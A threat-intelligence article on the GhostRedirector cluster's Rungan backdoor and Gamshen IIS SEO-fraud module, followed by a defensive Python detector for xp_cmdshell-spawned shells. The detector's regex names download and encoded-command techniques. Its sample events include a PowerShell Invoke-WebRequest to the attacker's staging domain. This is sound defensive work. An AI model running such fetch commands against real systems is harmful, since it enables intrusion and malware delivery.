GhostRedirector compromises Windows servers utilizing Rungan backdoor and Gamshen IIS module

Cybersecurity researchers have uncovered a previously undocumented threat cluster known as GhostRedirector, which has compromised at least 65 Windows servers, primarily located in Brazil, Thailand, and Vietnam. According to Slovak cybersecurity company ESET, the attacks have resulted in the deployment of a passive C++ backdoor named Rungan and a native Internet Information Services (IIS) module referred to as Gamshen. The threat actor is believed to have been active since at least August 2024.

Rungan can execute commands on a compromised server, while Gamshen provides SEO fraud-as-a-service, manipulating search engine results to boost the page ranking of a target website. ESET researcher Fernando Tavella noted that Gamshen modifies responses only when a request originates from Googlebot, so regular visitors are never served the manipulated content. Even so, participation in the SEO fraud scheme can damage the reputation of the compromised host website by associating it with dubious SEO practices. The group has also targeted entities in Peru, the United States, Canada, Finland, India, the Netherlands, the Philippines, and Singapore, with indiscriminate activity affecting sectors such as education, healthcare, insurance, transportation, technology, and retail.

Initial access to target networks is achieved by exploiting a vulnerability, likely an SQL injection flaw, followed by the use of PowerShell to deliver additional tools hosted on a staging server identified as “868id[.]com.” ESET’s observations indicate that most unauthorised PowerShell executions originated from the binary sqlserver.exe, via its xp_cmdshell stored procedure, which can execute commands on the machine. Rungan listens for incoming requests matching a specific URL pattern and parses and executes the commands they embed. It supports four commands: mkuser, to create a user on the server; listfolder, to collect information from a specified path; addurl, to register new URLs for the backdoor; and cmd, to run a command on the server using pipes and the CreateProcessA API. Written in C/C++, Gamshen belongs to an IIS malware family known as “Group 13,” which can function both as a backdoor and as a tool for SEO fraud. It operates similarly to IISerpent, another IIS-specific malware documented by ESET in August 2021, which intercepts HTTP requests from search engine crawlers in order to alter the server’s responses.
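The initial-access chain described above (a shell launched out of the SQL Server process through xp_cmdshell, then PowerShell fetching tooling from the staging domain) is something a defender can hunt for in process-creation telemetry. The detector below is an added example, not ESET's analysis code or anything from the threat actor; its event field names, file paths and sample events are constructed assumptions, and sqlservr.exe is listed alongside the article's sqlserver.exe because it is the default image name of the SQL Server service.

```python
import re
from collections import namedtuple

# Process-creation record with my own shorthand field names, mirroring what a
# defender would pull from Windows Security event 4688 or Sysmon event 1.
Event = namedtuple("Event", "time host parent image cmdline")

# The SQL Server service should not normally launch a shell. The article names
# sqlserver.exe; sqlservr.exe is the default image name of the service.
SQL_PARENTS = {"sqlservr.exe", "sqlserver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line tells for fetching or decoding remote content; the staging
# domain named in the article is matched directly.
FETCH_RE = re.compile(
    r"(-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|downloadstring|downloadfile"
    r"|invoke-webrequest|\biwr\b|\bcurl\b|868id\.com)", re.IGNORECASE)

def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    parent, image = basename(ev.parent), basename(ev.image)
    if parent in SQL_PARENTS and image in SHELLS:
        reasons.append(f"{image} spawned by {parent} (xp_cmdshell pattern)")
    if image in SHELLS and FETCH_RE.search(ev.cmdline):
        reasons.append("shell command line fetches or decodes remote content")
    return reasons

def scan(events):
    """Pair each flagged event with its reasons, keeping input order."""
    return [(ev, r) for ev in events if (r := classify(ev))]

# Constructed sample telemetry: one benign admin script on a web host, then
# two events on a database host shaped like the chain the article describes.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("2024-08-01T10:00:00Z", "web01", r"C:\Windows\explorer.exe", PWSH,
          r"powershell.exe -File C:\scripts\backup.ps1"),
    Event("2024-08-01T10:07:00Z", "db01", SQLSERVR, r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c dir C:\inetpub\wwwroot"),
    Event("2024-08-01T10:08:00Z", "db01", SQLSERVR, PWSH,
          "powershell.exe -NoProfile -Command Invoke-WebRequest http://868id.com/x"),
]
```

Calling `scan(SAMPLE_EVENTS)` returns only the two db01 events, the first for its parent lineage alone and the second for both the lineage and the fetch from the staging domain.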
